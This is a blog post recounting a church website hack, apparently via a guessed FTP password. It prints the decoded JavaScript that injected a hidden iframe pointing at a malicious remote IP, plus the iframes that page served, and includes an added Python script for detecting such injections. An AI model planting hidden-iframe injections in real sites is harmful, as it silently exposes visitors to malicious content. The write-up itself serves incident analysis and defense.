Well, my church's website got bit this week. I'll point out that I have nothing to do with the hosting or security of this site, I just help them keep it updated. The site is hosted at IPower, which in my overall opinion as a hosting company falls somewhere between pond scum and moss. No wait, make it rock. Scum or moss would be giving them too much credit. (That's another story though.) Fortunately for IPower, this one can't be blamed on them. It appears someone guessed our FTP login's password (probably a port scan and brute force attack) and recursively perused through our site modifying any file which was named index.*. The following snippet of code was added to the bottom of each of those pages: The string is just a URL-encoded string of JavaScript. The unescape() function de-obfuscates it and then it is passed into eval() to be executed. This is the equivalent code:
[code]<script>
window.status='Done';
// Writes a hidden 1-line iframe whose src is the remote PHP script; the random number is only a cache-buster
document.write('<iframe name=8b4 src=\'http://58.65.232.33/gpack/index.php?'+Math.round(Math.random()*20655)+'4d\' width=765 height=27 style=\'display: none\'></iframe>');
</script>
[/code]
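An added example (not from the original post) of how a site maintainer could find this kind of injection without ever running it: decode the eval(unescape('...')) payload statically, pull out the iframe targets, and walk a site tree for index.* files that carry one. The sample page is constructed here from the decoded script above.

```python
import re
from pathlib import Path
from urllib.parse import quote, unquote

# Injection shape described above: eval(unescape('<quoted string containing %XX escapes>'))
INJECT_RE = re.compile(
    r"eval\s*\(\s*unescape\s*\(\s*['\"]([^'\"]*%[0-9A-Fa-f]{2}[^'\"]*)['\"]\s*\)\s*\)")
# iframe src inside the decoded JS; tolerates the backslash-escaped quotes used in document.write()
IFRAME_SRC_RE = re.compile(r"<iframe[^>]*src=\\?['\"]?([^'\"\s>]+)", re.IGNORECASE)

def decode_payload(encoded: str) -> str:
    """Statically decode the %XX string; it is never evaluated."""
    return unquote(encoded)

def find_injections(html: str) -> list:
    """Return [(decoded_js, [iframe src prefixes])] for every eval(unescape()) in the page."""
    found = []
    for m in INJECT_RE.finditer(html):
        decoded = decode_payload(m.group(1))
        found.append((decoded, IFRAME_SRC_RE.findall(decoded)))
    return found

def scan_site(root: str) -> dict:
    """Map each infected index.* file under root to the injections found in it."""
    hits = {}
    for path in Path(root).rglob("index.*"):
        if path.is_file():
            found = find_injections(path.read_text(errors="replace"))
            if found:
                hits[str(path)] = found
    return hits

# Constructed sample: the decoded script from the post, re-encoded the way the attacker's string was
DECODED_SCRIPT = (
    "window.status='Done';"
    "document.write('<iframe name=8b4 src=\\'http://58.65.232.33/gpack/index.php?'"
    "+Math.round(Math.random()*20655)+'4d\\' width=765 height=27 style=\\'display: none\\'></iframe>');")
SAMPLE_PAGE = ("<html><body>Welcome</body></html>\n<script>eval(unescape('"
               + quote(DECODED_SCRIPT, safe="") + "'))</script>")

if __name__ == "__main__":
    for js, srcs in find_injections(SAMPLE_PAGE):
        print("injected iframe targets:", srcs)
```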
So, you can see whenever someone visits your site, an iframe is loaded at the bottom of the page that includes the output of a remote (and malicious) PHP script. I immediately called up and changed the password on our main FTP account and had two additional FTP accounts deleted that weren't even in use. I don't even know what their passwords were... yikes! Then I searched through the entire site and manually cleaned all files that had the offending JavaScript inserted into them. I'm fairly confident that was the only damage done, but it's hard to be sure. Luckily the entire site is just a bunch of static content so there were no code secrets or additional passwords to be lost. The whole thing kind of makes me uneasy though. Of course, the brilliant folks over at IPower don't keep ANY authentication logs for their FTP servers. Lame. Well, today I got a chance to fiddle with the script injection to try and see what it was loading. The contents of the malicious page were as follows:
[code] <iframe src= http://58.65.232.33/nonick/index.php frameborder="0" width="1" height="1" scrolling="no" name=counter></iframe>
<iframe src= http://58.65.232.33/gpack/index1.php frameborder="0" width="1" height="1" scrolling="no" name=counter></iframe>
<iframe src= http://58.65.232.33/counter.php frameborder="0" width="1" height="1" scrolling="no" name=counter></iframe>
<iframe src= http://58.65.232.33/01/01/update.php frameborder="0" width="1" height="1" scrolling="no" name=counter></iframe>
[/code]
Interesting. Apparently just an additional layer of smoke, but those four iframes still pointed to pages on the same server. The first iframe returned the following with a 200 status code:
[code] .   ![/code]
I'll let you take a stab at what that was supposed to do. The second iframe returned the following with a 200 status code:
[code]Can`t connect to mysql server[/code]
Very, very 31337 indeed. The third iframe returned the following with a 200 status code:
[code] <HTML>
<HEAD>
<TITLE>Not Found</TITLE>
</HEAD>
<BODY>
The requested URL was not found on this server.
<br><br><HR noshade="noshade">
Apache/1.3.31 Server at Port 80
</BODY>
</HTML>[/code]
Not sure why it didn't give me a 404 status code. The fourth iframe returned an empty response body with a 302 status code and an empty Location header. Weird. Well, it looks like they have either taken down the malicious content since Sunday, or they are too stupid to keep their site up. In the meantime we'll try not to be too stupid to have easy-to-crack passwords. And I leave us with this well-written line from Weird Al:
[code]%57%68%61%74%63%68%61%27%6C%6C%20%77%61%6E%6E%61%20%64%6F%3F%20%57%61%6E%6E%61%20%62%65%20%68%61%63%6B%65%72%73%3F%20%43%6F%64%65%20%63%72%61%63%6B%65%72%73%2C%20%73%6C%61%63%6B%65%72%73%20%57%61%73%74%69%6E%27%20%74%69%6D%65%20%77%69%74%68%20%61%6C%6C%20%74%68%65%20%63%68%61%74%72%6F%6F%6D%20%79%61%6B%6B%65%72%73%3F%209%20%74%6F%205%20%63%68%69%6C%6C%69%6E%27%20%61%74%20%48%65%77%6C%65%74%74%2D%50%61%63%6B%61%72%64%20%57%68%61%74%3F[/code]